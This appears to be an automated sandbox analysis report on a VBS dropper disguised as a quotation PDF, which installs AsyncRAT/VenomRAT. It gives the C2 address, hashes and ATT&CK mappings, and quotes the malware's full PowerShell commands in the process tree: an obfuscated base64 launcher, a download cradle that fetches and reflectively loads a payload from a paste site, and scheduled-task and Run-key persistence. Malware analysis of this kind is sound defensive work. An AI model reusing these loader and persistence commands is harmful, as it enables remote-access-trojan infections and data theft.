asyncrat | c8745638f7e73d20f8637b0b64dc8db76ec128acfc62991a5fc57f82369a56d7

Analysis

max time kernel
128s
max time network
146s
platform
windows10-2004_x64
resource
win10v2004-20250314-en
resource tags

arch:x64arch:x86image:win10v2004-20250314-enlocale:en-usos:windows10-2004-x64system
submitted
31/03/2025, 14:03

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

COTIZACIÓN_23-5_Pdf.vbs
Size

8.5MB
MD5

60ec698e60d2fb823393bc2ee1664742
SHA1

4c632c11036d0eec042d9eddb2b351ae2ed3caf4
SHA256

19b9972f970ca207cf8494582bdf8c68b8a1f9cbbc9a8df0151d05c26cb9b3a1
SHA512

e2e179b5444aa9fab84cb939a4864289bb61a4d2198a07e920eac9de5c1a210771f190b8d7470224007ec4b7d9442b37dfff8d2023258516960b207070c03e6f
SSDEEP

96:5JTmIl/6GLHWtZdJ7AZPFZI6kNl5C+VwX2vR5VU3hOGIAKJV2T45aBSSFfkD:TllyjjdVMFZNkNls2vv8hAJJV8ve

Score

10^/10

asyncrat venomrat default defense_evasion discovery execution persistence rat

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://textbin.net/raw/ezjmofz3s6

exe.dropper

https://textbin.net/raw/ezjmofz3s6

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

196.251.89.167:6900

Mutex

vcbkomkyscjsqqkd

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

VenomRAT 1 IoCs

Detects VenomRAT.

rat

resource	yara_rule
behavioral1/memory/2848-114-0x0000000000400000-0x0000000000418000-memory.dmp	VenomRAT

Venomrat family
venomrat

Blocklisted process makes network request 4 IoCs

flow	pid	Process
7	1004	powershell.exe
16	1004	powershell.exe
32	4892	powershell.exe
37	4892	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 7 IoCs

Using powershell.exe command.

execution

PowerShell

T1059.001

pid	Process
1412	powershell.exe
1004	powershell.exe
4824	powershell.exe
4892	powershell.exe
2920	powershell.exe
1124	powershell.exe
968	powershell.exe

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	WScript.exe
Key value queried	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\____________________________________________-------.lnk	powershell.exe

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1062200478-553497403-3857448183-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\____________________________________________------- = "Powershell.exe -WindowStyle hidden \"& 'C:\\Users\\Admin\\AppData\\Local\\Temp\\xx2.vbs' \""	powershell.exe

Hide Artifacts: Hidden Window 1 TTPs 1 IoCs

Windows that would typically be displayed when an application carries out an operation can be hidden.

defense_evasion

Hidden Window

T1564.003

pid	Process
3204	cmd.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 4892 set thread context of 2848	4892	powershell.exe	114

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
3320	schtasks.exe

Suspicious behavior: EnumeratesProcesses 34 IoCs

pid	Process
1412	powershell.exe
1412	powershell.exe
1004	powershell.exe
1004	powershell.exe
4892	powershell.exe
4892	powershell.exe
4892	powershell.exe
4892	powershell.exe
4812	powershell.exe
4812	powershell.exe
4824	powershell.exe
4824	powershell.exe
2776	powershell.exe
2776	powershell.exe
4812	powershell.exe
4824	powershell.exe
2776	powershell.exe
4824	powershell.exe
2920	powershell.exe
2920	powershell.exe
2920	powershell.exe
1124	powershell.exe
1124	powershell.exe
1124	powershell.exe
968	powershell.exe
968	powershell.exe
968	powershell.exe
2848	MSBuild.exe
2848	MSBuild.exe
2848	MSBuild.exe
2848	MSBuild.exe
2848	MSBuild.exe
2848	MSBuild.exe
2848	MSBuild.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

description	pid	Process
Token: SeDebugPrivilege	1412	powershell.exe
Token: SeDebugPrivilege	1004	powershell.exe
Token: SeDebugPrivilege	4892	powershell.exe
Token: SeDebugPrivilege	4824	powershell.exe
Token: SeDebugPrivilege	2776	powershell.exe
Token: SeDebugPrivilege	4812	powershell.exe
Token: SeDebugPrivilege	2920	powershell.exe
Token: SeDebugPrivilege	1124	powershell.exe
Token: SeDebugPrivilege	968	powershell.exe
Token: SeDebugPrivilege	2848	MSBuild.exe

Suspicious use of SetWindowsHookEx 1 IoCs

pid	Process
2848	MSBuild.exe

Suspicious use of WriteProcessMemory 34 IoCs

description	pid	Process	procid_target
PID 4128 wrote to memory of 6108	4128	WScript.exe	85
PID 4128 wrote to memory of 6108	4128	WScript.exe	85
PID 4128 wrote to memory of 3320	4128	WScript.exe	87
PID 4128 wrote to memory of 3320	4128	WScript.exe	87
PID 4128 wrote to memory of 1412	4128	WScript.exe	89
PID 4128 wrote to memory of 1412	4128	WScript.exe	89
PID 1412 wrote to memory of 1004	1412	powershell.exe	91
PID 1412 wrote to memory of 1004	1412	powershell.exe	91
PID 1004 wrote to memory of 4892	1004	powershell.exe	97
PID 1004 wrote to memory of 4892	1004	powershell.exe	97
PID 4892 wrote to memory of 4824	4892	powershell.exe	98
PID 4892 wrote to memory of 4824	4892	powershell.exe	98
PID 4892 wrote to memory of 4812	4892	powershell.exe	99
PID 4892 wrote to memory of 4812	4892	powershell.exe	99
PID 4892 wrote to memory of 2776	4892	powershell.exe	100
PID 4892 wrote to memory of 2776	4892	powershell.exe	100
PID 4824 wrote to memory of 2920	4824	powershell.exe	101
PID 4824 wrote to memory of 2920	4824	powershell.exe	101
PID 3204 wrote to memory of 1124	3204	cmd.exe	104
PID 3204 wrote to memory of 1124	3204	cmd.exe	104
PID 1124 wrote to memory of 1388	1124	powershell.exe	105
PID 1124 wrote to memory of 1388	1124	powershell.exe	105
PID 1388 wrote to memory of 968	1388	WScript.exe	108
PID 1388 wrote to memory of 968	1388	WScript.exe	108
PID 968 wrote to memory of 5832	968	powershell.exe	110
PID 968 wrote to memory of 5832	968	powershell.exe	110
PID 4892 wrote to memory of 2848	4892	powershell.exe	114
PID 4892 wrote to memory of 2848	4892	powershell.exe	114
PID 4892 wrote to memory of 2848	4892	powershell.exe	114
PID 4892 wrote to memory of 2848	4892	powershell.exe	114
PID 4892 wrote to memory of 2848	4892	powershell.exe	114
PID 4892 wrote to memory of 2848	4892	powershell.exe	114
PID 4892 wrote to memory of 2848	4892	powershell.exe	114
PID 4892 wrote to memory of 2848	4892	powershell.exe	114

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN_23-5_Pdf.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4128
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
  2⤵
  PID:6108
- C:\Windows\System32\schtasks.exe
  "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
  2⤵
  - Scheduled Task/Job: Scheduled Task
  PID:3320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★W★BR★DQ★M★BK★HU★SgBP★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN_23-5_Pdf.vbs');powershell $Yolopolhggobek;
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1412
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/XQ40JuJO/r/ee.etsap//:sptth'' , ''C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN_23-5_Pdf.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
    3⤵
    - Blocklisted process makes network request
    - Command and Scripting Interpreter: PowerShell
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:1004
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
      4⤵
      Blocklisted process makes network request
      Command and Scripting Interpreter: PowerShell
      Drops startup file
      Suspicious use of SetThreadContext
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:4892
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        5⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4824
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        6⤵
        Command and Scripting Interpreter: PowerShell
        Adds Run key to start application
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2920
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN_23-5_Pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4812
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Users\Admin\AppData\Local\Temp\COTIZACIÓN_23-5_Pdf.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2776
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        5⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of SetWindowsHookEx
        
        PID:2848

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
- Suspicious use of WriteProcessMemory
PID:3204
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  - Command and Scripting Interpreter: PowerShell
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1124
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    - Suspicious use of WriteProcessMemory
    PID:1388
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\COTIZACIÃ“N_23-5_Pdf.vbs'
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:968
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\COTIZACIÃ“N_23-5_Pdf.vbs
        5⤵
        
        PID:5832

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Window

T1564.003

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
6cf293cb4d80be23433eecf74ddb5503

SHA1
24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
446dd1cf97eaba21cf14d03aebc79f27

SHA1
36e4cc7367e0c7b40f4a8ace272941ea46373799

SHA256
a7de5177c68a64bd48b36d49e2853799f4ebcfa8e4761f7cc472f333dc5f65cf

SHA512
a6d754709f30b122112ae30e5ab22486393c5021d33da4d1304c061863d2e1e79e8aeb029cae61261bb77d0e7becd53a7b0106d6ea4368b4c302464e3d941cf7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
f22ccda7c57312a17fa804834c4ae74b

SHA1
0f96cafafbc46f955b5aa4fc857878c76af0d040

SHA256
277d9a65e352d267d588ef7fb84b7899e833bcc1011a2a2e77ac2f9836ad8772

SHA512
6bf0dd77dc4e519106e0bef046e9f3804c5c961a30ba5ebeffdacfd5588e88b13836cb0dd378501c02a7a0ea8363fc181dadbdb21b3039270d77282c07110e1a

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
adaa15596d573129df4bd33e1cf6cd91

SHA1
b119a279f2f7f8497a7a05c8324a627ec9cc3209

SHA256
5d39c40c088c8029994492835280a7c01fc696664ddc962231d8e15949fa425a

SHA512
17bab545ca9c7aa775a41b402270574c6baa64b6111b1d451048ce95f4db64a87c102a00d1c5d441e8b26aef512b4635bc37aea459b4cd4aaf8c6aa23de886f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
eaf926f2f4f729c6a13defed0820a5ab

SHA1
5a363272f9c113b111ab607a358129d7ed2e41ce

SHA256
f7d2a7c5ab7520a4969650045ddc8765861ee71fa42740dd4492c1a3e7f7d966

SHA512
4e845e16dd23dd9226a38d4951a9a0097d0531967db878e5117bfa45aa6641e96f123fc791e1b068dafdf41c803965ed60c8dc6e7957912f78b764c7f52ec380

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1615c762e98d9bed820acd0d59d81974

SHA1
a959943742e579284cd8a6451eaa9cb4524e92ba

SHA256
ed968a76a6994c3b7ca509aee4511500ea60a1ab45e29c34962b18f766cfa0dc

SHA512
81438c4fea18b56e0fd25a7bb560a2c85f9ba174bbaa8a43978df12ec42538085e5c636e08e8677e70b71c230bc784e8eaa1276db4ea12510db88f5dfc0de488

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
a7957b7776dde24b5c616a5ef0b20973

SHA1
ae8d046d1596e0c657d777bf5b418dd911a753fb

SHA256
23dbe2cabf8e49894cd35c30b12f8e95d4f292698979f4f3f6546877b6a43eb3

SHA512
06e12bd8fd45de39d3fdf90b069443ea21aea029b47101132e7afd92e79593e4290f0dfc44939223cdeca3af20f5615566e701b01efd9ab68dceddc22e2f0f4d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_o3raoznq.uze.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll01.txt

Filesize
34B

MD5
551de3894acfc565eaf2ea5fd7a7760a

SHA1
39a4d83c3d551deca48be49fda4a2d1824c084b8

SHA256
ff53ba58dd8ec7f149bd3aa6c14b60baf059d46cc0b312f234858710f6c3635f

SHA512
5545f75a3c632756807a6dbeec49af2f645ae295d27f0df0c4205b505baadf8d5b5057a0fb95a6edc79bbd2c561e619c8c3e2c707d09b8354285c9ef735f3e8c

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll02.txt

Filesize
300KB

MD5
1ed4ff6b14c799919ea5baaa9a01134d

SHA1
8d498985e857c1ec16c9f0b05cae4d684fb145da

SHA256
6d7cfe7ef865d8a7f4cee574736cf8ccf1b5dcba1c3c3b48a50498038921b384

SHA512
2ae2eab2f09e7499a8e078e35765868d5d8ca77e59ecb97c46700f7d2c4d324f438b63a81084de5ec484efa9383775688726136a8a02c82b0c0d9c1852ae5c1d

Download Submit
C:\Users\Admin\AppData\Local\Temp\dll03.ps1

Filesize
988B

MD5
2e34e9ef86b79d3974864f9806080abd

SHA1
62c70a08dc7ef85500613ecf0df794e1c11407a1

SHA256
9117cd1b2842dfc4128adedf4354762c67c7c001375a03ea3735758721487fe7

SHA512
95bf30ba6617542c3f2f5bfbacadce4d0198c4e213cadab6fc56bc4f5400b0dae07c3caf511dd9e9edf81194b626366bce6692cb5a639ed8c822be27a4bb9804

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx1.ps1

Filesize
282B

MD5
b094f227c79abfc0903a9b305203075a

SHA1
fd0fc367d2ef0027cf935264da182389db464e5b

SHA256
0c3a5a7559e7c46a0769022433588e0db2fa750d2c871c6909332a6719f61833

SHA512
5a4202474e5f71318d95717ed4fc6887e3c5aff0aa98c951a426ad12a8a842add837b52ee99bef93f8a37a7b741c00a8e6f3979d76be4c2a92dbefb95631e129

Download Submit
C:\Users\Admin\AppData\Local\Temp\xx2.vbs

Filesize
203B

MD5
134dc516b72e8b4b3b44997273237301

SHA1
8144e4597433a94635472b46e49246af8ed6d58e

SHA256
0cfbd590d3e9320194bc954d8559d1e33d4c4f3670ebe5eb8319401f118a1d34

SHA512
ea12ba38ce76c8e96f629c18fe97e3f39cd54a787638899a2bd6ccf7500d21c31000b4ef5217ce2ce8c68d42571c609c7dd111f1f3cc18730ea48458cae7b0b9

Download Submit
memory/1412-11-0x0000019892220000-0x0000019892242000-memory.dmp

Filesize
136KB

Download
memory/1412-13-0x00007FFE58D80000-0x00007FFE59841000-memory.dmp

Filesize
10.8MB

Download
memory/1412-12-0x00007FFE58D80000-0x00007FFE59841000-memory.dmp

Filesize
10.8MB

Download
